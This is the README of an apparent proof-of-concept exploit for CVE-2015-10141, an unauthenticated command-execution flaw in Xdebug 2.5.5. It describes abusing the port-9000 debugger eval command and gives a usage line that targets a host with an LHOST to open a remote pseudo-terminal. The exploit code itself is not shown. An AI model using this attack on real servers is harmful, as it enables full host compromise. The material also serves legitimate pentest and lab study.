
POC exploit for CVE-2015-10141
# Exploit Title: xdebug Unauthenticated Command Execution
# Exploit Author: D3Ext
# Vendor Homepage: https://xdebug.org/
# Sofware Link: https://pecl.php.net/package/xdebug/2.5.5/windows
# Version: 2.5.5
# Tested on: Kali Linux 2025
# CVE: CVE-2015-10141
Existe uma vulnerabilidade de injeção de comandos do sistema operacional não autenticada nas versões 2.5.5 e anteriores do Xdebug, uma extensão de depuração PHP. Quando a depuração remota está ativada, o Xdebug escuta na porta 9000 e aceita comandos do protocolo do depurador sem autenticação. Um atacante pode enviar um comando eval manipulado através desta interface para executar código PHP arbitrário, que pode invocar funções de nível de sistema, como system() ou passthru(). Isto resulta no comprometimento total do anfitrião sob os privilégios do utilizador do servidor web.
usage: CVE-2015-10141.py [-h] -u URL -l LHOST
CVE-2015-10141 - xdebug v2.5.5 RCE Exploit
options:
-h, --help show this help message and exit
-u, --url URL URL of the target
-l, --lhost LHOST LHOST to trigger the RCE
Basta executar o exploit e fornecer um URL válido com um ficheiro PHP como index.php e o anfitrião local. Depois o exploit tentará estabelecer um pseudo-terminal que lhe permite executar comandos remotamente
python3 exploit.py -u http://10.10.10.83/index.php -l 10.10.16.3
Tenha em conta que, em alguns casos, a saída não será refletida e verá apenas a primeira linha do comando executado; isto não é um problema do script, a vulnerabilidade funciona assim)
https://github.com/advisories/GHSA-267w-63f8-m896
https://www.exploit-db.com/exploits/44568
https://www.rapid7.com/db/modules/exploit/unix/http/xdebug_unauth_exec/
https://nvd.nist.gov/vuln/detail/CVE-2015-10141
https://www.wiz.io/vulnerability-database/cve/cve-2015-10141
https://feedly.com/cve/CVE-2015-10141
https://www.tenable.com/plugins/nessus/112210
Este projeto está sob licença MIT
Copyright © 2025, D3Ext